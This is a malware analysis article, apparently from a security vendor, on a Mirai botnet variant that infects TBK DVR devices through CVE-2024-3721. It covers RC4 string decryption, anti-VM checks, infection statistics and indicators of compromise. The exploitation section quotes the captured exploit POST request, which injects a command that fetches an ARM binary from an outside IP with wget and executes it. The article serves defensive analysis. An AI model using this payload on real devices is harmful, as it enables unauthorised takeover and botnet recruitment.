The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.ExploitationDuring a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a CVE-2024-3721. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0" The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbkTypically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.Malware implant – Mirai variantThe source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.Data decryptionThe data decryption routine in this variant is implemented as a simple RC4 algorithm.The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: 6e7976666525a97639777d2d7f303177.The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted structure, which is a simple string list:Data decryption routineThe global linked list with decrypted data is accessed whenever the malware needs particular strings.Adding decrypted strings to the global listAnti-VM and anti-emulationTo detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc directory, which is the proc filesystem on Linux.Each process ID (PID) has its own folder containing useful information, such as cmdline, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with VMware or QEMU-arm in their command line.Process checkThe implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:Allowed directoriesOnce those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.Infection statisticsAccording to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.ConclusionExploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.Indicators of compromiseHost-based (MD5 hashes)011a406e89e603e93640b10325ebbdc824fd043f9175680d0c061b28a2801dfc29b83f0aae7ed38d27ea37d26f3c91172e9920b21df472b4dd1e8db4863720bf3120a5920f8ff70ec6c5a45d7bf2acc83c2f6175894bee698c61c6ce76ff967445a41ce9f4d8bb2592e8450a1de95dcc524a57c8c595d9d4cd364612fe2f057c74dee23eaa98e2e8a7fc355f06a11d97761909a234ee4f1d856267abe30a39357eb3d72fa7d730d3dbca4df34fe262748a3e1176cb160fb42357fa3f46f0cbde8d92e79b7940f0ac5b01bbb77737ca6c95eaa3fa47a609ceefa24e8c7787bd9996ee8cc2edc8227a640cef77d4a24e83aaf34c27edfc3531cf1cf2f2e9a9c45bba32f4eef7de6bae9507a63bde1a43aaIPs116.203.104[.]203130.61.64[.]122161.97.219[.]84130.61.69[.]123185.84.81[.]19454.36.111[.]116192.3.165[.]37162.243.19[.]4763.231.92[.]2780.152.203[.]13442.112.26[.]36